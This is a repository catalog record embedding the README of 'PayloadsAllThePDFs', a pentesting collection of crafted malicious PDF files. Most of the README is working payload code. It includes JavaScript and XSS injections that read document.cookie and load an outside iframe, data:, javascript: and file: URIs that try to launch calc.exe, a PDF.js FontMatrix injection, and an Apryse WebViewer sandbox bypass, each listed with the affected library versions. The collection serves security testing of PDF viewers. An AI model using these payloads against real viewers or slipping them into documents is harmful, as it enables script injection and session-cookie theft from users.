{"id":13863886,"url":"https://github.com/luigigubello/PayloadsAllThePDFs","last_synced_at":"2025-07-14T20:31:45.622Z","repository":{"id":50746301,"uuid":"353865881","full_name":"luigigubello/PayloadsAllThePDFs","owner":"luigigubello","description":"PDF Files for Pentesting","archived":false,"fork":false,"pushed_at":"2024-10-04T08:52:56.000Z","size":1088,"stargazers_count":459,"open_issues_count":0,"forks_count":64,"subscribers_count":6,"default_branch":"main","last_synced_at":"2024-11-23T03:31:59.449Z","etag":null,"topics":["pentesting","web-pentest","web-security"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/luigigubello.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-04-02T00:58:58.000Z","updated_at":"2024-11-21T08:45:32.000Z","dependencies_parsed_at":"2024-04-12T00:30:10.221Z","dependency_job_id":"4581d740-0514-4415-9da9-8f6b394f2a8b","html_url":"https://github.com/luigigubello/PayloadsAllThePDFs","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/luigigubello/PayloadsAllThePDFs","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luigigubello%2FPayloadsAllThePDFs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luigigubello%2FPayloadsAllThePDFs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luigigubello%2FPayloadsAllThePDFs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luigigubello%2FPayloadsAllThePDFs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/luigigubello","download_url":"https://codeload.github.com/luigigubello/PayloadsAllThePDFs/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luigigubello%2FPayloadsAllThePDFs/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":265344831,"owners_count":23750566,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["pentesting","web-pentest","web-security"],"created_at":"2024-08-05T09:00:28.188Z","updated_at":"2025-07-14T20:31:44.966Z","avatar_url":"https://github.com/luigigubello.png","language":null,"funding_links":["https://www.buymeacoffee.com/gubello"],"categories":["Entries"],"sub_categories":["Exploitation"],"readme":"# Payloads All The PDFs\n\n\u003ca href=\"https://twitter.com/intent/follow?screen_name=evaristegal0is\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/evaristegal0is?style=social\" alt=\"Follow @evaristegal0is\"\u003e\u003c/a\u003e\n\nA list of crafted malicious PDF files to test the security of PDF readers and tools.\u003c/br\u003e\n\n**Write-Up:** [JavaScript-based PDF Viewers, Cross Site Scripting, and PDF files](https://gubello.me/blog/pdf-viewers-xss-and-pdf-files/)\n\n### Vulnerabilities found\n\n- [Foxit PDF SDK For Web](https://www.npmjs.com/package/@foxitsoftware/foxit-pdf-sdk-for-web-library) 7.5.0 (~600 weekly downloads)\n- [PDFTron WebViewer](https://www.npmjs.com/package/@pdftron/webviewer) 7.2.0, 7.3.1, 8.6.1, 10.1.0, 10.7.2, 10.12.0 (~87k weekly downloads)\n- [PSPDFKit for Web](https://www.npmjs.com/package/pspdfkit) 2021.4.1 (~13k weekly downloads)\n- [Syncfusion ej2-pdfviewer](https://www.npmjs.com/package/@syncfusion/ej2-pdfviewer) 20.2.40 (~6.8k weekly downloads)\n- [React PDF viewer](https://www.npmjs.com/package/@react-pdf-viewer/core) 3.6.0 (~34k weekly downloads)\n- [PDF.js](https://www.npmjs.com/package/pdfjs-dist) 4.1.392 (~2 million weekly downloads)\n\n## Payloads list\n\n### payload1.pdf\n\n**Line 31**. Understand if [Acrobat Javascript APIs](https://www.adobe.com/content/dam/acom/en/devnet/acrobat/pdfs/AcrobatDC_js_api_reference.pdf) are supported.\n```\n/JS (app.alert\\(1\\); Object.getPrototypeOf(function*(){}).constructor = null; ((function*(){}).constructor(\"document.write('\u003cscript\u003econfirm(document.cookie);\u003c/script\u003e\u003ciframe src=https://14.rs\u003e');\"))().next();)\n```\n\n**Line 69**. Try to run arbitrary Javascript abusing the data URI scheme.\n```\n/URI (data:text/html,\u003cscript\u003ealert\\(2\\);\u003c/script\u003e)\n```\n\n**Line 177**. Try to inject Javascript code using annotations.\n```\n\u003c\u003c/Type /Annot /Rect [284.7745656638 581.6814031126 308.7745656638 605.6814031126 ] /Subtype /Text /M (D:20210402013803+02'00) /C [1 1 0 ] /Popup 15 0 R /T (\\\"\u003e'\u003e\u003cdetails open ontoggle=confirm\\(3\\)\u003e) /P 6 0 R /Contents (��^@\"^@\u003e^@'^@\u003e^@\u003c^@d^@e^@t^@a^@i^@l^@s^@ ^@o^@p^@e^@n^@ ^@o^@n^@t^@o^@g^@g^@l^@e^@=^@c^@o^@n^@f^@i^@r^@m^@\\(^@'^@X^@S^@S^@'^@\\)^@\u003e) \u003e\u003e\n```\n\n### payload2.pdf\n\n**Line 69**. Try to run arbitrary Javascript abusing the data URI scheme.\n```\n/URI (\\\"\u003e'\u003e\u003cdetails open ontoggle=confirm\\(2\\)\u003e)\n```\n\n### payload3.pdf\n\n**Line 31**. Understand if the PDF reader or tool runs arbitrary Javascript bypassing the Acrobat APIs.\n```\n/JS (app.alert\\(1\\); confirm\\(2\\); prompt\\(document.cookie\\); document.write\\(\"\u003ciframe src='https://14.rs'\u003e\"\\);)\n```\n\n**Line 69**. Try to run remote commands on Windows.\n```\n/URI (file:///C:/Windows/system32/calc.exe)\n```\n\n### payload4.pdf\n\n**Line 31**. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.\n```\n/JS (app.alert\\(1\\); app.openDoc(\"/C/Windows/System32/calc.exe\");)\n```\n\n**Line 69**. Try to run remote commands on Windows.\n```\n /URI (START C:/\\Windows/\\system32/\\calc.exe)\n```\n\n### payload5.pdf\n\n**Line 31**. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.\n```\n/JS (app.alert\\(1\\); app.launchURL\\(\"START C:/\\Windows/\\system32/\\calc.exe\", true\\); app.launchURL\\(\"javascript:confirm\\(3\\);\", true\\);)\n```\n\n**Line 69**. Try to run arbitrary Javascript abusing the data URI scheme.\n```\n /URI (javascript:confirm\\(2\\);)\n```\n\n### payload6.pdf\n\n**Line 31**. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.\n```\n /JS (app.alert\\(1\\); app.launchURL\\(\"/C/Windows/system32/calc.exe\", true\\); app.launchURL\\(\"'\u003e\u003cdetails open ontoggle=confirm\\(3\\);\", true\\);)\n```\n\n### payload7.pdf\n\n**Line 50**. Try to run arbitrary Javascript injected via annotation. It works on vulnerable Apryse PDF Webviewer versions.\n```\n/V (\"\u003e'\u003e\u003c/div\u003e\u003cdetails/open/ontoggle=confirm(document.cookie)\u003e\u003c/details\u003e)\n```\n\n### payload8.pdf\n\n**Line 19**. Try to run arbitrary Javascript injected via `FontMatrix`. It works on vulnerable `PDF.js` versions. Proof-of-Concept created by [Rob Wu and Thomas Rinsma](https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/).\n```\n\u003c\u003c /BaseFont /SNCSTG+CMBX12 /FontDescriptor 6 0 R /FontMatrix [ 1 2 3 4 5 (1\\); alert\\('origin: '+window.origin+', pdf url: '+\\(window.PDFViewerApplication?window.PDFViewerApplication.url:document.URL\\)) ] /Subtype /Type1 /Type /Font \u003e\u003e\n```\n\n### payload9.pdf\n\n**Line 32**. Javascript sandbox bypass in Apryse WebViewer SDK (10.9.x - 10.12.0) to run arbitrary embedded Javascript in PDFs.\n```\n/JS (app.alert\\(1\\); console.println\\(delete window\\); console.println\\(delete confirm\\); console.println\\(delete document\\); window.confirm\\(document.cookie\\);)\n```\n\n___\n\n![Hack the planet](img/hack_the_planet.gif)\n\nIf you want to support me you can offer me a coffee ☕\u003c/br\u003e\u003c/br\u003e\n\u003ca href=\"https://www.buymeacoffee.com/gubello\" target=\"_blank\"\u003e\u003cimg src=\"https://bmc-cdn.nyc3.digitaloceanspaces.com/BMC-button-images/custom_images/orange_img.png\" alt=\"Buy Me A Coffee\" style=\"height: auto !important;width: auto !important;\" \u003e\u003c/a\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fluigigubello%2FPayloadsAllThePDFs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fluigigubello%2FPayloadsAllThePDFs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fluigigubello%2FPayloadsAllThePDFs/lists"}